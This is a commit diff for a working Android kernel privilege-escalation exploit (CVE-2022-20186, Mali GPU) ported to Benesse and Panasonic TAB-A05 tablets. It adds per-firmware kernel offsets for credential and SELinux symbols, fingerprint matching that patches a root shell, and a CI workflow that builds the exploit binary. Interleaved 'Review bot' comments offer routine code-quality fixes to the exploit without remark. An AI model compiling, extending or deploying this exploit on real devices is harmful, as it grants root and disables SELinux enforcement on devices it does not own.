No commit message
s1204IT committed Jun 28, 2024
1 parent abd0914 commit 9cad991
Showing 4 changed files with 256 additions and 57 deletions.
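--- a/.github/workflows/compile.yml
+++ b/.github/workflows/compile.yml
@@ -0,0 +1,27 @@
+name: Compile
+
+on:
+push:
+paths:
+- '*.c'
+- '*.h'
+- '.github/workflows/compile.yml'
+workflow_dispatch:
+
+jobs:
+compile:
+name: Compile
+runs-on: ubuntu-latest
+
+steps:
+- name: Checkout
+uses: actions/checkout@v4
+
+- name: Compile
+run: $ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android28-clang mali_alias.c -o mali_alias
+
+- name: Uplaod
+uses: actions/upload-artifact@v4
+with:
+name: CVE-2022-20186
+path: mali_alias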
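Review bot: Both `actions/checkout@v4` and `actions/upload-artifact@v4` are referenced by a mutable tag, so every run executes whatever the upstream maintainer currently points that tag at; pinning each to a full commit hash with the tag kept as a comment, `uses: actions/checkout@<full-commit-sha> # v4`, makes the toolchain step reproducible and lets a dependency-update bot bump the pin deliberately. The upload step's name is misspelled: `- name: Upload`. The `run:` line relies on `$ANDROID_NDK` being exported by the runner image; that holds for the GitHub-hosted ubuntu-latest image but presumably not for a self-hosted runner, so a short comment above the step stating that assumption would help whoever moves the job.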
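--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1 @@
+/mali_alias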
159 changes: 102 additions & 57 deletions mali_alias.c
@@ -1,6 +1,7 @@
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
Expand All @@ -11,8 +12,7 @@
#include <sys/wait.h>
#include <sys/system_properties.h>

#include "stdbool.h"

#include "offsets.h"
#include "mali.h"
#include "mali_base_jm_kernel.h"
#include "midgard.h"
Expand All @@ -27,11 +27,11 @@

#define POOL_SIZE 16384

#define RESERVED_SIZE 32
#define RESERVED_SIZE 12

#define TOTAL_RESERVED_SIZE 1024

#define KERNEL_BASE 0x80000000
#define KERNEL_BASE 0x40008000

#define OVERWRITE_INDEX 256

Expand All @@ -43,45 +43,9 @@

#define ADD_COMMIT_INDEX 3

#define AVC_DENY_2108 0x92df1c

#define SEL_READ_ENFORCE_2108 0x942ae4

#define INIT_CRED_2108 0x29a0570

#define COMMIT_CREDS_2108 0x180b0c

#define ADD_INIT_2108 0x9115c000

#define ADD_COMMIT_2108 0x912c3108

#define AVC_DENY_2201 0x930af4

#define SEL_READ_ENFORCE_2201 0x9456bc

#define INIT_CRED_2201 0x29b0570

#define COMMIT_CREDS_2201 0x183df0

#define ADD_INIT_2201 0x9115c000

#define ADD_COMMIT_2201 0x9137c108

#define AVC_DENY_2202 0x930b50

#define SEL_READ_ENFORCE_2202 0x94551c

#define INIT_CRED_2202 0x29b0570
static uint64_t sel_read_enforce;

#define COMMIT_CREDS_2202 0x183e3c

#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570

#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c

static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108;

static uint64_t avc_deny = AVC_DENY_2108;
static uint64_t avc_deny;

static int atom_number = 1;

Expand Down Expand Up @@ -252,7 +216,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
struct MALI_JOB_HEADER jh = {0};
jh.is_64b = true;
jh.type = MALI_JOB_TYPE_WRITE_VALUE;

struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
payload.type = type;
payload.immediate_value = value;
Expand Down Expand Up @@ -375,24 +339,105 @@ void select_offset() {
char fingerprint[256];
int len = __system_property_get("ro.build.fingerprint", fingerprint);
printf("fingerprint: %s\n", fingerprint);
if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
avc_deny = AVC_DENY_2108;
sel_read_enforce = SEL_READ_ENFORCE_2108;
fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);

if(!strcmp(fingerprint, CTX_00_04_000)) {
avc_deny = AVC_DENY_CTX_00_04_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_04_000;
fixup_root_shell(INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000, SEL_READ_ENFORCE_CTX_00_04_000, ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000);
return;
}

if(!strcmp(fingerprint, CTX_00_05_000)) {
avc_deny = AVC_DENY_CTX_00_05_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_05_000;
fixup_root_shell(INIT_CRED_CTX_00_05_000, COMMIT_CREDS_CTX_00_05_000, SEL_READ_ENFORCE_CTX_00_05_000, ADD_INIT_CTX_00_05_000, ADD_COMMIT_CTX_00_05_000);
return;
}

if(!strcmp(fingerprint, CTX_00_08_000)) {
avc_deny = AVC_DENY_CTX_00_08_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_08_000;
fixup_root_shell(INIT_CRED_CTX_00_08_000, COMMIT_CREDS_CTX_00_08_000, SEL_READ_ENFORCE_CTX_00_08_000, ADD_INIT_CTX_00_08_000, ADD_COMMIT_CTX_00_08_000);
return;
}

if(!strcmp(fingerprint, CTX_00_09_000)) {
avc_deny = AVC_DENY_CTX_00_09_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_09_000;
fixup_root_shell(INIT_CRED_CTX_00_09_000, COMMIT_CREDS_CTX_00_09_000, SEL_READ_ENFORCE_CTX_00_09_000, ADD_INIT_CTX_00_09_000, ADD_COMMIT_CTX_00_09_000);
return;
}

if(!strcmp(fingerprint, CTX_01_00_000)) {
avc_deny = AVC_DENY_CTX_01_00_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_00_000;
fixup_root_shell(INIT_CRED_CTX_01_00_000, COMMIT_CREDS_CTX_01_00_000, SEL_READ_ENFORCE_CTX_01_00_000, ADD_INIT_CTX_01_00_000, ADD_COMMIT_CTX_01_00_000);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
avc_deny = AVC_DENY_2201;
sel_read_enforce = SEL_READ_ENFORCE_2201;
fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);

if(!strcmp(fingerprint, CTX_01_01_001)) {
avc_deny = AVC_DENY_CTX_01_01_001;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_01_001;
fixup_root_shell(INIT_CRED_CTX_01_01_001, COMMIT_CREDS_CTX_01_01_001, SEL_READ_ENFORCE_CTX_01_01_001, ADD_INIT_CTX_01_01_001, ADD_COMMIT_CTX_01_01_001);
return;
}

if(!strcmp(fingerprint, CTX_01_04_000)) {
avc_deny = AVC_DENY_CTX_01_04_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_04_000;
fixup_root_shell(INIT_CRED_CTX_01_04_000, COMMIT_CREDS_CTX_01_04_000, SEL_READ_ENFORCE_CTX_01_04_000, ADD_INIT_CTX_01_04_000, ADD_COMMIT_CTX_01_04_000);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
avc_deny = AVC_DENY_2202;
sel_read_enforce = SEL_READ_ENFORCE_2202;
fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);

if(!strcmp(fingerprint, CTX_01_11_000)) {
avc_deny = AVC_DENY_CTX_01_11_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_11_000;
fixup_root_shell(INIT_CRED_CTX_01_11_000, COMMIT_CREDS_CTX_01_11_000, SEL_READ_ENFORCE_CTX_01_11_000, ADD_INIT_CTX_01_11_000, ADD_COMMIT_CTX_01_11_000);
return;
}

if(!strcmp(fingerprint, CTZ_00_03_000)) {
avc_deny = AVC_DENY_CTZ_00_03_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_00_03_000;
fixup_root_shell(INIT_CRED_CTZ_00_03_000, COMMIT_CREDS_CTZ_00_03_000, SEL_READ_ENFORCE_CTZ_00_03_000, ADD_INIT_CTZ_00_03_000, ADD_COMMIT_CTZ_00_03_000);
return;
}

if(!strcmp(fingerprint, CTZ_01_00_000)) {
avc_deny = AVC_DENY_CTZ_01_00_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_00_000;
fixup_root_shell(INIT_CRED_CTZ_01_00_000, COMMIT_CREDS_CTZ_01_00_000, SEL_READ_ENFORCE_CTZ_01_00_000, ADD_INIT_CTZ_01_00_000, ADD_COMMIT_CTZ_01_00_000);
return;
}

if(!strcmp(fingerprint, CTZ_01_01_000)) {
avc_deny = AVC_DENY_CTZ_01_01_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_01_000;
fixup_root_shell(INIT_CRED_CTZ_01_01_000, COMMIT_CREDS_CTZ_01_01_000, SEL_READ_ENFORCE_CTZ_01_01_000, ADD_INIT_CTZ_01_01_000, ADD_COMMIT_CTZ_01_01_000);
return;
}

if(!strcmp(fingerprint, CTZ_01_02_004)) {
avc_deny = AVC_DENY_CTZ_01_02_004;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_004;
fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_ENFORCE_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004);
return;
}

if(!strcmp(fingerprint, CTZ_01_02_005)) {
avc_deny = AVC_DENY_CTZ_01_02_005;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_005;
fixup_root_shell(INIT_CRED_CTZ_01_02_005, COMMIT_CREDS_CTZ_01_02_005, SEL_READ_ENFORCE_CTZ_01_02_005, ADD_INIT_CTZ_01_02_005, ADD_COMMIT_CTZ_01_02_005);
return;
}

if(!strcmp(fingerprint, CTZ_01_03_000)) {
avc_deny = AVC_DENY_CTZ_01_03_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_03_000;
fixup_root_shell(INIT_CRED_CTZ_01_03_000, COMMIT_CREDS_CTZ_01_03_000, SEL_READ_ENFORCE_CTZ_01_03_000, ADD_INIT_CTZ_01_03_000, ADD_COMMIT_CTZ_01_03_000);
return;
}

err(1, "unable to match build id\n");
}

Expand Down Expand Up @@ -491,11 +536,11 @@ int run_exploit() {
int main() {
setbuf(stdout, NULL);
setbuf(stderr, NULL);

select_offset();

int ret = -1;
sleep(1);
ret = run_exploit();
if (!ret) system("sh");
if (!ret) system("getenforce");
}
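Review bot: In select_offset the value returned by `__system_property_get` is stored in `len` and never inspected, so the function prints and string-compares `fingerprint` even when `ro.build.fingerprint` could not be read; bionic's contract is presumably a zero return with an empty value in that case (confirm against the NDK header), so a guard such as `if (len <= 0) errx(1, "ro.build.fingerprint not readable");` before the printf would fail fast instead of falling through fourteen comparisons to the generic error. The final `err(1, "unable to match build id\n")` is also the wrong call: err() appends ": " plus strerror(errno) after the message, so the embedded newline splits the output and the errno text is unrelated to the failure — `errx(1, "unable to match build id");` reports it cleanly. The fourteen `if(!strcmp(...))` blocks differ only in the macro suffix and set the same three things each time, so a comment on the first block noting that every entry must keep `avc_deny`, `sel_read_enforce` and the fixup_root_shell argument order in sync would at least document the invariant the copy-paste is relying on. The start of select_offset, and the whole of fixup_root_shell, lie outside this hunk.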
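--- a/offsets.h
+++ b/offsets.h
@@ -0,0 +1,126 @@
+
+// TAB-A05-BD 00.04.000
+#define CTX_00_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.04.000/00.04.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_04_000 0x5a120
+#define AVC_DENY_CTX_00_04_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_04_000 0x3653a8
+#define INIT_CRED_CTX_00_04_000 0x11553f0
+#define ADD_INIT_CTX_00_04_000 0x910fc000
+#define ADD_COMMIT_CTX_00_04_000 0x91048108
+
+// TAB-A05-BD 00.05.000
+#define CTX_00_05_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.05.000/00.05.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_05_000 0x5a120
+#define AVC_DENY_CTX_00_05_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_05_000 0x3653a8
+#define INIT_CRED_CTX_00_05_000 0x11553f0
+#define ADD_INIT_CTX_00_05_000 0x910fc000
+#define ADD_COMMIT_CTX_00_05_000 0x91048108
+
+// TAB-A05-BD 00.08.000
+#define CTX_00_08_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.08.000/00.08.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_08_000 0x5a120
+#define AVC_DENY_CTX_00_08_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_08_000 0x3653a8
+#define INIT_CRED_CTX_00_08_000 0x11553f0
+#define ADD_INIT_CTX_00_08_000 0x910fc000
+#define ADD_COMMIT_CTX_00_08_000 0x91048108
+
+// TAB-A05-BD 00.09.000
+#define CTX_00_09_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.09.000/00.09.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_09_000 0x5a120
+#define AVC_DENY_CTX_00_09_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_09_000 0x3653a8
+#define INIT_CRED_CTX_00_09_000 0x11553f0
+#define ADD_INIT_CTX_00_09_000 0x910fc000
+#define ADD_COMMIT_CTX_00_09_000 0x91048108
+
+// TAB-A05-BD 01.00.000
+#define CTX_01_00_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys"
+#define COMMIT_CREDS_CTX_01_00_000 0x5a120
+#define AVC_DENY_CTX_01_00_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
+#define INIT_CRED_CTX_01_00_000 0x11553f0
+#define ADD_INIT_CTX_01_00_000 0x910fc000
+#define ADD_COMMIT_CTX_01_00_000 0x91048108
+
+// TAB-A05-BD 01.01.001
+#define CTX_01_01_001 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.01.001/01.01.001:user/release-keys"
+#define COMMIT_CREDS_CTX_01_01_001 0x5a120
+#define AVC_DENY_CTX_01_01_001 0x35acc8
+#define SEL_READ_ENFORCE_CTX_01_01_001 0x365418
+#define INIT_CRED_CTX_01_01_001 0x11653f0
+#define ADD_INIT_CTX_01_01_001 0x910fc000
+#define ADD_COMMIT_CTX_01_01_001 0x91048108
+
+// TAB-A05-BD 01.04.000
+#define CTX_01_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.04.000/01.04.000:user/release-keys"
+#define COMMIT_CREDS_CTX_01_04_000 0x5a120
+#define AVC_DENY_CTX_01_04_000 0x35ac10
+#define SEL_READ_ENFORCE_CTX_01_04_000 0x365360
+#define INIT_CRED_CTX_01_04_000 0x11653f0
+#define ADD_INIT_CTX_01_04_000 0x910fc000
+#define ADD_COMMIT_CTX_01_04_000 0x91048108
+
+// TAB-A05-BD 01.11.000
+#define CTX_01_11_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys"
+#define COMMIT_CREDS_CTX_01_11_000 0x5a120
+#define AVC_DENY_CTX_01_11_000 0x359c20
+#define SEL_READ_ENFORCE_CTX_01_11_000 0x364370
+#define INIT_CRED_CTX_01_11_000 0x11653f0
+#define ADD_INIT_CTX_01_11_000 0x910fc000
+#define ADD_COMMIT_CTX_01_11_000 0x91048108
+
+// TAB-A05-BA1 00.03.000
+#define CTZ_00_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/00.03.000/00.03.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_00_03_000 0x5a120
+#define AVC_DENY_CTZ_00_03_000 0x359c20
+#define SEL_READ_ENFORCE_CTZ_00_03_000 0x364370
+#define INIT_CRED_CTZ_00_03_000 0x11753f0
+#define ADD_INIT_CTZ_00_03_000 0x910fc000
+#define ADD_COMMIT_CTZ_00_03_000 0x91048108
+
+// TAB-A05-BA1 01.00.000
+#define CTZ_01_00_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_00_000 0x5a120
+#define AVC_DENY_CTZ_01_00_000 0x359c20
+#define SEL_READ_ENFORCE_CTZ_01_00_000 0x364370
+#define INIT_CRED_CTZ_01_00_000 0x11653f0
+#define ADD_INIT_CTZ_01_00_000 0x910fc000
+#define ADD_COMMIT_CTZ_01_00_000 0x91048108
+
+// TAB-A05-BA1 01.01.000
+#define CTZ_01_01_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.01.000/01.01.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_01_000 0x5a120
+#define AVC_DENY_CTZ_01_01_000 0x359a68
+#define SEL_READ_ENFORCE_CTZ_01_01_000 0x3641b8
+#define INIT_CRED_CTZ_01_01_000 0x11653f0
+#define ADD_INIT_CTZ_01_01_000 0x910fc000
+#define ADD_COMMIT_CTZ_01_01_000 0x91048108
+
+// TAB-A05-BA1 01.02.004
+#define CTZ_01_02_004 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.004/01.02.004:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_02_004 0x5a120
+#define AVC_DENY_CTZ_01_02_004 0x35bad0
+#define SEL_READ_ENFORCE_CTZ_01_02_004 0x366190
+#define INIT_CRED_CTZ_01_02_004 0x11a53f0
+#define ADD_INIT_CTZ_01_02_004 0x910fc000
+#define ADD_COMMIT_CTZ_01_02_004 0x91048108
+
+// TAB-A05-BA1 01.02.005
+#define CTZ_01_02_005 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_02_005 0x5a120
+#define AVC_DENY_CTZ_01_02_005 0x35bad0
+#define SEL_READ_ENFORCE_CTZ_01_02_005 0x366190
+#define INIT_CRED_CTZ_01_02_005 0x11a53f0
+#define ADD_INIT_CTZ_01_02_005 0x910fc000
+#define ADD_COMMIT_CTZ_01_02_005 0x91048108
+
+// TAB-A05-BA1 01.03.000
+#define CTZ_01_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.03.000/01.03.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_03_000 0x5a120
+#define AVC_DENY_CTZ_01_03_000 0x35bad0
+#define SEL_READ_ENFORCE_CTZ_01_03_000 0x366190
+#define INIT_CRED_CTZ_01_03_000 0x11a53f0
+#define ADD_INIT_CTZ_01_03_000 0x910fc000
+#define ADD_COMMIT_CTZ_01_03_000 0x91048108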
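Review bot: The new header has no include guard, so a second `#include "offsets.h"` anywhere in the translation unit would redefine every macro; add `#pragma once` (or a `OFFSETS_H` guard pair) at the top. The per-build comments name only the model and firmware version; a one-line header comment stating where these values come from and that all six must be regenerated together whenever a build is added would tell the next maintainer what the invariant is, since nothing in the file enforces it. Several consecutive builds share identical values, which is fine, but a note saying that is intentional would stop a reader from assuming a copy-paste slip.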
